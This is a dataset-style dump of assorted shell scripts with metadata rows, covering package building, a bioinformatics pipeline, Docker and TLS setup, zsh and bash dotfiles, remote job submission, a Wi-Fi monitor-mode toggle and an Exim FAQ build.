mkdir -p $INSTALL_PREFIX/$RELEVANCED_VAR_DIR/data
mkdir -p $INSTALL_PREFIX/$RELEVANCED_LOG_DIR
mkdir -p $INSTALL_PREFIX/$RELEVANCED_ETC_DIR
mkdir -p $INSTALL_PREFIX/etc/logrotate.d
mkdir -p `dirname $INSTALL_PREFIX$INITD_DST`
cp $JSON_CONFIG_SRC $INSTALL_PREFIX/$RELEVANCED_ETC_DIR/relevanced.json
cp $INITD_SRC $INSTALL_PREFIX$INITD_DST
chmod g-w $INSTALL_PREFIX$INITD_DST
chmod a+x $INSTALL_PREFIX$INITD_DST
LOGROTATE_DEST=$INSTALL_PREFIX/etc/logrotate.d/relevanced
cp $LOGROTATE_CONFIG_SRC $LOGROTATE_DEST
chmod 644 $LOGROTATE_DEST
log "creating package"
# Split the comma-separated -d list and rebuild it as repeated
# '-d "<dep>"' flags for fpm, trimming trailing spaces from each entry.
IFS=',' read -a deps <<< "$PACKAGE_DEPENDENCIES"
PACKAGE_DEPENDENCIES=
for element in "${deps[@]}"
do
element=`echo $element | sed 's/ *$//'`
PACKAGE_DEPENDENCIES="$PACKAGE_DEPENDENCIES -d \"$element\""
done
# NOTE(review): OS and DISTRO appear to be leftovers of an older fpm
# invocation; only FPM is still referenced below — confirm and remove.
OS="ubuntu"
DISTRO="trusty"
FPM="fpm"
# The full fpm invocation is assembled as one string and eval'd so the
# embedded escaped quotes around $DESCRIPTION and the prefix mapping
# survive as single arguments.
CMD="$FPM -s dir -t $PACKAGE_TYPE \
-n $PACKAGE_NAME -v $PACKAGE_VERSION \
--iteration $PACKAGE_ITERATION \
-a $PACKAGE_ARCH \
$PACKAGE_DEPENDENCIES \
-p $OUTPUT_PKG_PATH \
--config-files etc/relevanced/relevanced.json \
--config-files etc/init.d/relevanced \
--config-files etc/logrotate.d/relevanced \
--before-install ${SCRIPT_DIR}/deb/preinst \
--after-install ${SCRIPT_DIR}/deb/postinst \
--before-remove ${SCRIPT_DIR}/deb/prerm \
--after-remove ${SCRIPT_DIR}/deb/postrm \
--url http://www.relevanced.org \
-m scott.ivey@gmail.com \
--license MIT \
--description \"$DESCRIPTION\" \
\"$INSTALL_PREFIX/=/\""
echo "running: $CMD"
eval "$CMD"
log "package created at $OUTPUT_PKG_PATH"
}
# Quote "$@" so multi-word arguments (e.g. -d "libstdc++6, libc6")
# reach parse_args intact instead of being re-split.
main "$@"
| true |
b6c76e88710392ae7f593f526ff8ca907ea0438a | Shell | altingia/LIONS | /lions.sh | UTF-8 | 4,742 | 3.75 | 4 | [] | no_license | #!/bin/bash
# Usage: .lions.sh <parameter.ctrl (opt.)>
set -e
# ===================================================================
# LIONS analysis pipeline
# ===================================================================
#
# Analyze an input .bam RNAseq file for transcripts which initiate in
# transposable elements and create an annotation file. Compare TE
# files between biological groups.
#
# Details can be found in README
#
echo ''
echo ''
echo '==============================================================='
echo '========================= L I O N S ==========================='
echo '==============================================================='
echo ''' _ _
_/ \|/ \_
/\\/ \//\
\|/<\ />\|/ *RAWR*
/\ _ /\ /
\|/\ Y /\|/
\/|v-v|\/
\/\_/\/
'''
echo ''
# INITIALIZATION ===================================================
# Start-up script which checks all requisites are operational for
# LIONS to run. Also initializes the project space
# *** WRITE LAST ***
# Read parameter file (imports run parameters)
# BUG FIX: quote "$1"/"$PARAMETER" — the unquoted forms broke (or were
# silently mis-parsed) for paths containing spaces, and under set -e an
# expansion error would abort the run with no useful message.
if [ -z "$1" ]
then
echo " No parameter input file specified. Importing default file:"
echo " ./LIONS/controls/parameter.ctrl"
export PARAMETER="controls/parameter.ctrl"
echo ''
else
echo " Import parameter file."
echo " Project Parameters: ./$1"
export PARAMETER="$1"
echo ''
fi
# Run parameter script
source "$PARAMETER" # works in bash only
# Run Initialization Script
echo ' running initializeLIONS.sh'
bash "$SCRIPTS/Initialize/initializeLIONS.sh"
echo ' initialization completed successfully.'
echo ''
# EAST LION =========================================================
# Per-library stage: align each library and run TE-initiation analysis,
# either locally or via the cluster scheduler ($QSUB), then wait for
# every job to report into the summit log before moving on.
echo ''
echo ' E A S T L I O N '
echo ''
echo ' ./LIONS/scripts/eastLion.sh '
echo '==============================================================='
echo ' Align reads to genome and perform TE-initiation analysis'
echo ''
cd $pDIR #./LIONS/projects/<projectName>
# Initialize Summit Log file
# Each eastLion.sh run (or the bypass branch below) appends one
# "<library> <0|1> <date>" line here when it finishes.
touch summitLog_$RUNID
# Loop through each library in input file
iterN=$(wc -l $INPUT_LIST | cut -f1 -d' ' -)
for nLib in $(seq $iterN)
do
# Extract row of entries from input list
rowN=$(sed -n "$nLib"p $INPUT_LIST)
# Library Name
libName=$(echo $rowN | cut -f1 -d' ')
echo " Iteration $nLib: $libName ------------------------------------------"
echo " run: $QSUB eastLion.sh $libName"
if [ ! -e $pDIR/$libName/$libName.lions ]
then
# Lions output for this library doesn't exist
# so let's make it.
if [ $CLUSTER == '1' ]
then # Cluster QSUB
$QSUB $SCRIPTS/eastLion.sh $libName
else # Local (no) QSUB
$SCRIPTS/eastLion.sh $libName
fi
elif [ $SORTBYPASS = '0' ]
then
# Lions output already exists but
# East Lion bypass is set to false, re-calculate lions file
# so let's make it.
if [ $CLUSTER == '1' ]
then # Cluster QSUB
$QSUB $SCRIPTS/eastLion.sh $libName
else # Local (no) QSUB
$SCRIPTS/eastLion.sh $libName
fi
else
# East Lion file already exists and bypass is true (1)
# Skip the east lion
echo " East Lions has previously been completed. "
lionSuccess='1'
echo $libName $lionSuccess $(date) >> $pDIR/summitLog_$RUNID
fi
echo " ... run complete -------------------------------------------"
echo ''
echo ''
done
# Check that all libraries have completed
#iterN is the number of libraries
# Poll the summit log until every library (including queued cluster
# jobs) has written its completion line.
summitN=$(wc -l $pDIR/summitLog_$RUNID | cut -f1 -d' ' )
while [ $summitN -lt $iterN ] # Not all EAST LION iterations have completed
do
# Verbose
echo " $summitN / $iterN East Lion scripts completed. Waiting..."
date
# Wait 10 minutes
sleep 600s # Actual
# Recalculate summitN
summitN=$(wc -l $pDIR/summitLog_$RUNID | cut -f1 -d' ')
done
# All runs completed
# Check if they are each succesful
# NOTE(review): cut defaults to TAB as its delimiter, but the bypass
# branch above writes space-separated fields — confirm eastLion.sh
# writes tabs, otherwise this success check never sees the '0' flag.
for Log in $(cut -f2 $pDIR/summitLog_$RUNID)
do
if [ $Log = '0' ];
then
echo " ERROR 15: One of the East Lion Libraries didn't finish."
exit 15
fi
done
# Clear summit log
rm $pDIR/summitLog_$RUNID
echo ''
echo ' All EAST LION scripts have completed. '
# WEST LION =========================================================
# Group-level stage: combine the per-library .lions files and analyze
# TE-initiation events across biological groups.
echo ''
echo ' W E S T L I O N '
echo ''
echo ' ./LIONS/scripts/westLion.sh '
echo '==============================================================='
echo ' Group and analyze lions files of TE-initiation events'
echo ''
cd $pDIR #./LIONS/projects/<projectName>
# Run West Lions Script
echo ' run: westLion.sh'
bash $SCRIPTS/westLion.sh
echo ''
echo ' WEST LION scripts have completed. '
6c51137204c3b915a9d95111949b79f5976af3d0 | Shell | Rean1030/docker4wordpress | /start.sh | UTF-8 | 929 | 3.328125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
set -o errexit
# shellcheck source=.env
# Provides SERVER_NAME and the .env file holding the !WORKER_*! placeholders.
source .env
# First run only: download mkcert and generate a locally-trusted TLS
# certificate for the configured server name.
if [ ! -f certs/nginx.key ] || [ ! -f certs/nginx.crt ]; then
    if [ ! -f mkcert ]; then
        curl -L https://github.com/FiloSottile/mkcert/releases/download/v1.4.3/mkcert-v1.4.3-linux-amd64 -o mkcert
    fi
    chmod +x mkcert
    ./mkcert -install
    ./mkcert -key-file nginx.key -cert-file nginx.crt "${SERVER_NAME}"
    mv nginx.key nginx.crt certs/
fi
# One nginx worker per CPU core; "|| true" keeps errexit from killing
# the script on a host where grep finds no "processor" lines.
WORKER_PROCESSES=$(grep -c processor /proc/cpuinfo || true)
SYS_FMLMT=$(cat /proc/sys/fs/file-max)
# NOTE(review): "ulimit -n" can print "unlimited", which makes the
# numeric comparison below fall through to the user limit — confirm.
USR_FMLMT=$(ulimit -n)
# Get the min num of system and user file open limit
if [ "$SYS_FMLMT" -lt "$USR_FMLMT" ]; then
    WORKER_CONNECTIONS=$SYS_FMLMT
else
    WORKER_CONNECTIONS=$USR_FMLMT
fi
ENV_CONFIG=".env"
# BUG FIX: the previous "[ ! -z ... ] && sed" one-liners returned
# non-zero when the value was empty, which aborted the script under
# errexit before docker-compose ever ran.
if [ -n "${WORKER_PROCESSES}" ]; then
    sed -i "s/!WORKER_PROCESSES!/${WORKER_PROCESSES}/" $ENV_CONFIG
fi
if [ -n "${WORKER_CONNECTIONS}" ]; then
    sed -i "s/!WORKER_CONNECTIONS!/${WORKER_CONNECTIONS}/" $ENV_CONFIG
fi
docker-compose up -d
e2b688232a2a84074131520bc6ffe1dca2baba9e | Shell | cbancroft/config | /zsh/zshplugins.zsh | UTF-8 | 7,707 | 3.484375 | 3 | [] | no_license | #!/usr/bin/env zsh
# Clone zgenom if you haven't already
# Locate (or bootstrap) the zgenom plugin manager. The default clone
# location is ~/.zqs-zgenom; an older ~/zgenom checkout is honored if
# it already exists.
if [[ -z "$ZGENOM_PARENT_DIR" ]]; then
ZGENOM_PARENT_DIR=$HOME
ZGENOM_SOURCE_FILE=$ZGENOM_PARENT_DIR/.zqs-zgenom/zgenom.zsh
# Set ZGENOM_SOURCE_FILE to the old directory if it already exists
if [[ -f "$ZGENOM_PARENT_DIR/zgenom/zgenom.zsh" ]]; then
ZGENOM_SOURCE_FILE=$ZGENOM_PARENT_DIR/zgenom/zgenom.zsh
fi
fi
# zgenom stores the clones plugins & themes in $ZGEN_DIR when it
# is set. Otherwise it stuffs everything in the source tree, which
# is unclean.
ZGEN_DIR=${ZGEN_DIR:-$HOME/.zgenom}
# Clone zgenom on first run (requires git and network access).
if [[ ! -f "$ZGENOM_SOURCE_FILE" ]]; then
if [[ ! -d "$ZGENOM_PARENT_DIR" ]]; then
mkdir -p "$ZGENOM_PARENT_DIR"
fi
pushd $ZGENOM_PARENT_DIR
git clone https://github.com/jandamm/zgenom.git .zqs-zgenom
popd
fi
if [[ ! -f "$ZGENOM_SOURCE_FILE" ]]; then
echo "Can't find zgenom.zsh"
else
# echo "Loading zgenom"
source "$ZGENOM_SOURCE_FILE"
fi
load-starter-plugin-list() {
echo "Creating a zgenom save"
ZGEN_LOADED=()
ZGEN_COMPLETIONS=()
if [[ ! -f ~/.zsh-quickstart-no-omz ]]; then
zgenom oh-my-zsh
fi
# If you want to customize your plugin list, create a file named
# .zsh-quickstart-local-plugins-example in your home directory. That
# file will be sourced during startup *instead* of running this
# load-starter-plugin-list function, so make sure to include everything
# from this function that you want to keep.
#
# To make customizing easier, there's a .zsh-quickstart-local-plugins-example
# file at the top level of the zsh-quickstart-kit repository that you can
# copy as a starting point. This keeps you from having to maintain a fork of
# the quickstart kit.
# If zsh-syntax-highlighting is bundled after zsh-history-substring-search,
# they break, so get the order right.
zgenom load zsh-users/zsh-syntax-highlighting
zgenom load zsh-users/zsh-history-substring-search
# Set keystrokes for substring searching
zmodload zsh/terminfo
bindkey "$terminfo[kcuu1]" history-substring-search-up
bindkey "$terminfo[kcud1]" history-substring-search-down
# Automatically run zgenom update and zgenom selfupdate every 7 days.
zgenom load unixorn/autoupdate-zgenom
# Colorize the things if you have grc installed. Well, some of the
# things, anyway.
zgenom load unixorn/warhol.plugin.zsh
# Warn you when you run a command that you've set an alias for without
# using the alias.
zgenom load djui/alias-tips
# Add my collection of git helper scripts.
zgenom load unixorn/git-extra-commands
# Supercharge your history search with fzf
zgenom load unixorn/fzf-zsh-plugin
# A collection of scripts that might be useful to sysadmins.
zgenom load skx/sysadmin-util
# Adds aliases to open your current repo & branch on github.
zgenom load peterhurford/git-it-on.zsh
# Load some oh-my-zsh plugins
zgenom oh-my-zsh plugins/pip
zgenom oh-my-zsh plugins/sudo
zgenom oh-my-zsh plugins/aws
zgenom oh-my-zsh plugins/chruby
zgenom oh-my-zsh plugins/colored-man-pages
zgenom oh-my-zsh plugins/git
zgenom oh-my-zsh plugins/github
zgenom oh-my-zsh plugins/python
zgenom oh-my-zsh plugins/rsync
zgenom oh-my-zsh plugins/screen
zgenom oh-my-zsh plugins/vagrant
zgenom load chrissicool/zsh-256color
# Load more completion files for zsh from the zsh-lovers github repo.
zgenom load zsh-users/zsh-completions src
# Docker completion
zgenom load srijanshetty/docker-zsh
# Load me last
GENCOMPL_FPATH=$HOME/.zsh/complete
# Very cool plugin that generates zsh completion functions for commands
# if they have getopt-style help text. It doesn't generate them on the fly,
# you'll have to explicitly generate a completion, but it's still quite cool.
zgenom load RobSis/zsh-completion-generator
# Add Fish-like autosuggestions to your ZSH.
zgenom load zsh-users/zsh-autosuggestions
# k is a zsh script / plugin to make directory listings more readable,
# adding a bit of color and some git status information on files and
# directories.
zgenom load supercrabtree/k
# p10k is faster and what I'm using now, so it is the new default
zgenom load romkatv/powerlevel10k powerlevel10k
# Save it all to init script.
zgenom save
}
# Pick the plugin list to load: a user-supplied override file when one
# is present and readable, otherwise the kit's default starter list.
setup-zgen-repos() {
  ZQS_override_plugin_list=''
  # If they have both, the new name takes precedence
  [[ -r "$HOME/.zsh-quickstart-local-plugins" ]] && ZQS_override_plugin_list="$HOME/.zsh-quickstart-local-plugins"
  if [[ ! -r "$ZQS_override_plugin_list" ]]; then
    # No usable override: fall back to the bundled starter plugins.
    load-starter-plugin-list
    return
  fi
  echo "Loading local plugin list from $ZQS_override_plugin_list"
  source "$ZQS_override_plugin_list"
  unset ZQS_override_plugin_list
}
# This comes from https://stackoverflow.com/questions/17878684/best-way-to-get-file-modified-time-in-seconds
# This works on both Linux with GNU fileutils and macOS with BSD stat.
# Naturally BSD/macOS and Linux can't share the same options to stat.
# Both variants print the file's mtime as seconds since the epoch, or
# "0" when the file does not exist (stat errors are suppressed).
if [[ $(uname | grep -ci -e Darwin -e BSD) = 1 ]]; then
# macOS version.
get_file_modification_time() {
modified_time=$(stat -f %m "$1" 2>/dev/null) || modified_time=0
echo "${modified_time}"
}
elif [[ $(uname | grep -ci Linux) = 1 ]]; then
# Linux version.
get_file_modification_time() {
modified_time=$(stat -c %Y "$1" 2>/dev/null) || modified_time=0
echo "${modified_time}"
}
fi
# check if there's an init.zsh file for zgen and generate one if not.
if ! zgen saved; then
setup-zgen-repos
fi
# Our installation instructions get the user to make a symlink
# from ~/.zgen-setup to wherever they checked out the zsh-quickstart-kit
# repository.
#
# Unfortunately, stat will return the modification time of the
# symlink instead of the target file, so construct a full path to hand off
# to stat so it returns the modification time of the actual .zgen-setup file.
if [[ -f ~/.zgen-setup ]]; then
REAL_ZGEN_SETUP=~/.zgen-setup
fi
if [[ -L ~/.zgen-setup ]]; then
REAL_ZGEN_SETUP="$(readlink ~/.zgen-setup)"
fi
# If you don't want my standard starter set of plugins, create a file named
# .zsh-quickstart-local-plugins and add your zgenom load commands there. Don't forget to
# run `zgenom save` at the end of your .zsh-quickstart-local-plugins file.
#
# Warning: .zgen-local-plugins REPLACES the starter list setup, it doesn't
# add to it.
#
# Use readlink in case the user is symlinking from another repo checkout, so
# they can use a personal dotfiles repository cleanly.
if [[ -f ~/.zgen-local-plugins ]]; then
REAL_ZGEN_SETUP=~/.zgen-local-plugins
fi
if [[ -L ~/.zgen-local-plugins ]]; then
REAL_ZGEN_SETUP="${HOME}/$(readlink ~/.zgen-local-plugins)"
fi
# Old file still works for backward compatibility, but we want the new file
# to take precedence when both exist.
if [[ -f ~/.zsh-quickstart-local-plugins ]]; then
REAL_ZGEN_SETUP=~/.zsh-quickstart-local-plugins
fi
if [[ -L ~/.zsh-quickstart-local-plugins ]]; then
REAL_ZGEN_SETUP="${HOME}/$(readlink ~/.zsh-quickstart-local-plugins)"
fi
# echo "REAL_ZGEN_ZETUP: $REAL_ZGEN_SETUP"
# If .zgen-setup is newer than init.zsh, regenerate init.zsh
# Compares mtimes via get_file_modification_time (0 when missing, so a
# missing init.zsh always triggers regeneration).
if [ $(get_file_modification_time ${REAL_ZGEN_SETUP}) -gt $(get_file_modification_time ~/.zgenom/init.zsh) ]; then
echo "$(basename ${REAL_ZGEN_SETUP}) ($REAL_ZGEN_SETUP) updated; creating a new init.zsh from plugin list in ${REAL_ZGEN_SETUP}"
setup-zgen-repos
fi
unset REAL_ZGEN_SETUP
| true |
258fda0a4f97d348769ecd4cebc91f25b336e65e | Shell | novanfatk/kemampuan-dasar | /kemampuan-dasar1/latihan/shellscripts/multiline-comment.sh | UTF-8 | 190 | 2.78125 | 3 | [] | no_license | tea@novan:~$ nano multiline-comment.sh
#!/bin/bash
: '
The following script calculates
the square value of the number, 5.
'
((area=5*5))
echo $area
tea@novan:~$ bash multiline-comment.sh
25 | true |
fe264d622a44ed7d05f104ec275cf1016bf1d63c | Shell | ptisserand/minecraft-server-setup | /doit/minecraft_world_backup.bash | UTF-8 | 549 | 3.828125 | 4 | [] | no_license | #!/bin/bash -e
# Abort on the first failed command. BUG FIX: previously '-e' lived
# only in the shebang, so it was silently dropped when the script was
# run as "bash minecraft_world_backup.bash <file>".
set -e
# Shared helpers (ssh_cmd, DO_HOSTNAME, DO_DOMAIN) live next to this script.
source "$(dirname "$(readlink -f "${0}")")/common"
SERVER="${DO_HOSTNAME}.${DO_DOMAIN}"
USER="root"
MINECRAFT_DATA_DIR="/home/minecraft/server/data"
##########################################
# Backup world
# $1 - local path of the .tar.gz archive to create. The archive is
#      streamed over ssh, then listed with 'tar tzpf' so a truncated
#      transfer fails the script (via set -e).
minecraft_world_backup() {
  local output=${1}
  echo "Backup minecraft world into ${output}"
  ssh_cmd "${USER}" "${SERVER}" "cd ${MINECRAFT_DATA_DIR} && tar czpf - world" > "${output}"
  tar tzpf "${output}" > /dev/null
}
if test $# -ne 1; then
  echo "${0} require 1 argument"
  exit 1
fi
minecraft_world_backup "${1}"
| true |
641f7974b0e15e1cc3b25e5471d72cee29bd05a0 | Shell | newsdev/int-newsapps-template | /scripts/_dashboard.sh | UTF-8 | 176 | 2.5625 | 3 | [] | no_license | #!/bin/bash
# Print a three-line run summary (type, name, log path) to stdout.
# Reads TYPE, NAME and LOGFILE_PATH plus the WARN/BASE color-escape
# variables from the caller's environment.
show_dashboard() {
  printf "Type: ${WARN} $TYPE ${BASE}\nName: ${WARN} $NAME ${BASE}\nLog:  ${WARN} $LOGFILE_PATH ${BASE}\n"
}
72c2b90783d33ae6e1409b90bd5aa43d8268ed95 | Shell | romabash/bashing-bash | /Terminal-tput/1.1_tput.sh | UTF-8 | 1,345 | 3.5625 | 4 | [] | no_license | #!/bin/bash
#--------------------------------------
# tput demo: print a bold message centered in the current terminal,
# then park the prompt on the bottom row.
#--------------------------------------

# Current terminal geometry, as reported by terminfo.
term_cols=$(tput cols)
term_rows=$(tput lines)

# Text to display in the middle of the screen.
message="$term_cols Columns by $term_rows Rows"

# Target cell: vertical middle, and the horizontal middle shifted left
# by half the message length so the text ends up centered.
target_row=$(( term_rows / 2 ))
target_col=$(( (term_cols / 2) - (${#message} / 2) ))

tput clear                           # wipe the screen
tput cup "$target_row" "$target_col" # move the cursor to the target cell
tput bold                            # bold on
echo $message
tput sgr0                            # reset all attributes

# Pause so the message is visible, then move the prompt to the bottom.
sleep 2
tput cup $( tput lines ) 0
#--------------------------------------
# End
#--------------------------------------
| true |
0a1a8d2aff6e44ec361919a3f98ee6c20832804b | Shell | kainabels/dotfiles | /bash/bash_profile | UTF-8 | 170 | 2.78125 | 3 | [] | no_license | #!/bin/sh
# vim: ft=sh
if [ -f ~/.bashrc ];then
source ~/.bashrc
fi
PATH=/usr/local/bin:$PATH
export PATH
if which rbenv >/dev/null; then
eval "$(rbenv init -)"
fi
| true |
2fff387c1a728774c3ad3fdb582a87ebe34ec48d | Shell | vbhavsar/dotfiles | /.profile | UTF-8 | 2,203 | 3.125 | 3 | [] | no_license |
if [[ "$SHELL" == "/bin/bash" ]]; then
unalias -a
elif [[ "$SHELL" == "/bin/zsh" ]]; then
unalias -m "*"
fi
set -o vi
export H=$HOME
if [[ -e "$HOME/sw/maven" ]]; then
export M2_HOME=$HOME/sw/maven
export PATH=$PATH:$M2_HOME/bin
fi
if [[ -d "/home/ec2-user/bin/jdk1.7.0" ]]; then
export JAVA_HOME=/home/ec2-user/bin/jdk1.7.0
export PATH=$PATH:$JAVA_HOME/bin
fi
if [[ -d /home/ec2-user/sw/go/bin ]] ; then
export PATH=$PATH:/home/ec2-user/sw/go/bin
fi
alias h='cd ~'
alias cls=clear
alias vi='vim'
alias ls='ls -G'
alias l='ls -ltr'
alias ll='ls -l'
alias la='ls -a'
alias clsl='cls;l'
alias clls='clsl'
alias clll='cls;ll'
alias clsll='cls;ll'
alias clsls='cls;ls'
alias s="cd ${H}/scripts"
alias src="cd ${H}/src"
alias repo="cd ${H}/repo"
alias bin="cd ${H}/bin"
alias u="cd ${H}/util"
alias grep='grep --color'
alias via='vi ~/.profile; apply'
alias apply='. ~/.profile; echo \\o/'
alias virc='vi ~/.vimrc'
alias tmp='cd ~/tmp'
alias sw='cd ~/sw'
alias www='cd /var/www'
alias wlog='cd /var/log'
alias log='cd /var/log'
alias conf='cd /etc/lighttpd/'
alias ..='cd ..'
alias ...='cd ../..'
alias ....='cd ../../..'
alias sls='screen -ls'
alias sR='screen -R'
alias visc='vi ~/.screenrc'
alias tls='tmux ls'
alias ta='tmux attach -t'
alias vit='vi ~/.tmux.conf'
alias t0='tail -q -n0 -F'
alias lp="_lp"
alias 3d='cal -3'
alias y='cal -y'
alias md='/home/ec2-user/sw/Markdown_1.0.1/Markdown.pl'
alias push_to_gh="git push origin master"
########################
# Functions
########################
function _lp(){
if [[ -z $1 ]]; then
command lp
else
c1=$(echo "$1" | cut -c1)
if [[ $c1 == "/" ]]; then
echo $1
else
fp="$(pwd)/$1"
if [[ ! -f $fp ]]; then
echo "no such file exists"
else
echo $fp
fi
fi
fi
}
alias gs='git status'
alias gd='git diff'
alias gb='git branch'
alias gc='git checkout'
alias pallete='for i in {0..255} ; do printf "\x1b[38;5;${i}mcolour${i}\n"; done'
alias viz='vi ~/.zshrc'
alias senv="echo \"set -o vi; alias cls='clear'; alias l='ls -ltr'; alias clsl='cls;l'; alias t0='tail -F -n0 -q'; \""
| true |
d367844eb38339737283d09a92a16197809fc176 | Shell | programster/swagger-ui | /docker/deploy.sh | UTF-8 | 511 | 3.515625 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
if ! [ -n "$BASH_VERSION" ];then
echo "this is not bash, calling self with bash....";
SCRIPT=$(readlink -f "$0")
/bin/bash $SCRIPT
exit;
fi
DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
# create the volume folder if it doesn't already exist.
mkdir -p $HOME/spec
# remove the existing container if it is already running.
docker kill swagger-ui
docker rm swagger-ui
docker run \
-d \
-p 80:8080 \
--name swagger-ui \
--volume $HOME/spec:/build/dist/spec \
swagger-ui-image
| true |
6e238ccd424249391151663892f23d04d51421e4 | Shell | RyanLuu/emsuite_web | /scripts/mainmast.sh | UTF-8 | 1,825 | 3.21875 | 3 | [] | no_license | #!/bin/bash
TRIM_ID=$(echo "$1" | tr -cd [:alnum:])
sql_update_start="UPDATE mainmast SET status=2 WHERE id=\"$TRIM_ID\""
sqlite3 db.sqlite3 "$sql_update_start"
USER="rluu"
REMOTE="brown.rcac.purdue.edu"
IDENTITY="~/.ssh/id_rsa"
WD="/home/rluu/mainmast"
remote_cp_tx() {
scp -i $IDENTITY $1 $USER@$REMOTE:$WD/$2
}
remote_cp_rx() {
scp -i $IDENTITY $USER@$REMOTE:$WD/$1 $2
}
remote_sh() {
ssh -i $IDENTITY $USER@$REMOTE "cd $WD; $1"
}
sql="SELECT map_file,gw,t,allow,filter,merge,Rlocal,Nround,Nnb,Ntb,Dkeep,Const FROM mainmast WHERE id=\"$TRIM_ID\""
params=$(sqlite3 db.sqlite3 "$sql")
mapfile=$(echo $params | awk -F '|' '{print "media/" $1}')
bn=$(basename -- "$mapfile")
ext="${bn##*.}"
filename=$1.$ext
gw=$(echo $params | awk -F '|' '{printf "%g", $2}')
t=$(echo $params | awk -F '|' '{print $3}')
allow=$(echo $params | awk -F '|' '{print $4}')
filter=$(echo $params | awk -F '|' '{print $5}')
merge=$(echo $params | awk -F '|' '{print $6}')
Rlocal=$(echo $params | awk -F '|' '{print $7}')
Nround=$(echo $params | awk -F '|' '{print $8}')
Nnb=$(echo $params | awk -F '|' '{print $9}')
Ntb=$(echo $params | awk -F '|' '{print $10}')
Dkeep=$(echo $params | awk -F '|' '{print $11}')
Const=$(echo $params | awk -F '|' '{print $12}')
remote_cp_tx $mapfile input/$filename
run_command="./run.sh input/$filename output/$1.pdb -gw $gw -t $t -allow $allow -filter $filter -merge $merge -Rlocal $Rlocal -Nround $Nround -Nnb $Nnb -Ntb $Ntb -Dkeep $Dkeep -Const $Const"
echo $run_command
remote_sh "$run_command"
remote_cp_rx output/$1.pdb media/mainmast/output/$1.pdb
if [ -f "media/mainmast/output/$1.pdb" ]; then
sql_update_end="UPDATE mainmast SET status=3 WHERE id=\"$TRIM_ID\""
else
sql_update_end="UPDATE mainmast SET status=4 WHERE id=\"$TRIM_ID\""
fi
sqlite3 db.sqlite3 "$sql_update_end"
| true |
b7f41a3b38b62c214b5ff2aa5f6e352dad785ef3 | Shell | bh0085/programming | /Bash/killNote.sh | UTF-8 | 70 | 2.71875 | 3 | [] | no_license | if [ $# -eq 1 ]
then
cat $notepad | sed -n "/^$1/ p" > $notepad
fi | true |
0afabaf0c0c625c8b1f5216f0a7a7a623e345866 | Shell | felixbns/venom | /fonctions/managed.sh | UTF-8 | 1,899 | 3.140625 | 3 | [] | no_license | ## Couleurs BASH
DEFAULT="\e[00m"
BLACK="\e[30m"
RED="\e[31m"
GREEN="\e[32m"
ORANGE="\e[33m"
BLUE="\e[34m"
MAGENTA="\e[35m"
CYAN="\e[36m"
WHITE="\e[37m"
## Effets de texte (défaut, gras, souligné)
export DEF="\e[0;0m"
export BOLD="\e[1m"
export UNDER="\e[4m"
eth0=`ifconfig | grep -v -i "ether" | awk {'print $1'} | sed "s/.$//" | grep "eth" | tail -1` > /dev/null 2>&1
wlan0=`ifconfig | awk {'print $1'} | sed "s/.$//" | grep "wlan" | tail -1` > /dev/null 2>&1
IPeth0=`ifconfig $eth0 | grep -w "inet" | awk '{print $2}'` > /dev/null 2>&1
IPwlan0=`ifconfig $wlan0 | grep -w "inet" | awk '{print $2}'` > /dev/null 2>&1
if [ -z $wlan0 ];then
if [ -z $IPeth0 ];then
interface="lo"
else
interface=$eth0
fi
else
interface=$wlan0
fi
ipprivee=`ifconfig $interface | grep -w "inet" | awk '{print $2}'` > /dev/null 2>&1
ippublique=`wget http://checkip.dyndns.org -O - -o /dev/null | cut -d : -f 2 | cut -d \< -f 1` > /dev/null 2>&1
gateway=`ip route | grep "default" | awk {'print $3'}` > /dev/null 2>&1
session=`hostname`
iprange=`ip route | grep "kernel" | awk {'print $1'}` > /dev/null 2>&1
path=`pwd`
ctrl_c() {
echo ""
echo -e -n "$MAGENTA [>]$CYAN Appuiez sur ENTRÉE pour afficher les options.$DEFAULT"
read -e -p "
" -n 1 -s
cd
cd $path/../
./suite.sh
}
echo -e "$MAGENTA [...]$CYAN Désactivation du mode monitor de votre carte Wifi... $DEFAULT"
airmon-ng stop $wlan0 > /dev/null 2>&1
sleep 1
wlan0=`ifconfig | grep "wlan0" | awk {'print $1'} | sed "s/.$//"`
if [ "$wlan0" = "wlan0" ];then
echo -e "$GREEN$BOLD [+]$DEFAULT$CYAN Le mode monitor de votre carte Wifi a été désactivé !$DEFAULT"
else
sleep 1
echo -e "$RED$BOLD [-]$DEFAULT$CYAN La désactivation du mode monitor de votre carte wifi a échoué !$DEFAULT"
fi
echo ""
echo -e -n "$MAGENTA [>]$CYAN Appuiez sur ENTRÉE pour afficher les options.$DEFAULT"
read -e -p "
" -n 1 -s
cd
cd $path/../menus/
./wifi.sh
| true |
1dfea1af32561c2a299e08bf8679163642df4ef7 | Shell | Exim/exim | /doc/doc-scripts/BuildFAQ | UTF-8 | 1,166 | 3.71875 | 4 | [] | no_license | #! /bin/sh
# Script to build the Exim FAQ in text and HTML formats.
/bin/rm -f FAQ.txt* html/FAQ* FAQ-html/* FAQ-html.tar.*
/bin/rm -f config.samples.tar.gz config.samples.tar.bz2
# The FAQchk Perl script checks for the numbers being in order and for the
# right number of blank lines at various places.
faqchk FAQ.src
if [ $? != 0 ]; then exit 1; fi
# HTML version
f2h FAQ.src html
echo "html/FAQ*.html made"
fc2k
echo "html/FAQ-KWIC*.html made"
cp html/FAQ* html/*.txt FAQ-html
echo "copied to FAQ-html"
tar cf FAQ-html.tar FAQ-html
gzip FAQ-html.tar
echo "FAQ-html.tar.gz made"
tar cf FAQ-html.tar FAQ-html
bzip2 -9 FAQ-html.tar
echo "FAQ-html.tar.gz2 made"
# ASCII version
f2txt FAQ.src FAQ.txt
echo "FAQ.txt made"
cp FAQ.txt FAQ.txt-t
gzip -v --best FAQ.txt-t
mv FAQ.txt-t.gz FAQ.txt.gz
echo "FAQ.txt.gz made"
cp FAQ.txt FAQ.txt-t
bzip2 -v -9 FAQ.txt-t
mv FAQ.txt-t.bz2 FAQ.txt.bz2
echo "FAQ.txt.bz2 made"
# Configuration samples
tar -chf config.samples.tar config.samples
gzip config.samples.tar
echo "config.samples.tar.gz made"
tar -chf config.samples.tar config.samples
bzip2 -9 config.samples.tar
echo "config.samples.tar.bz2 made"
# End
| true |
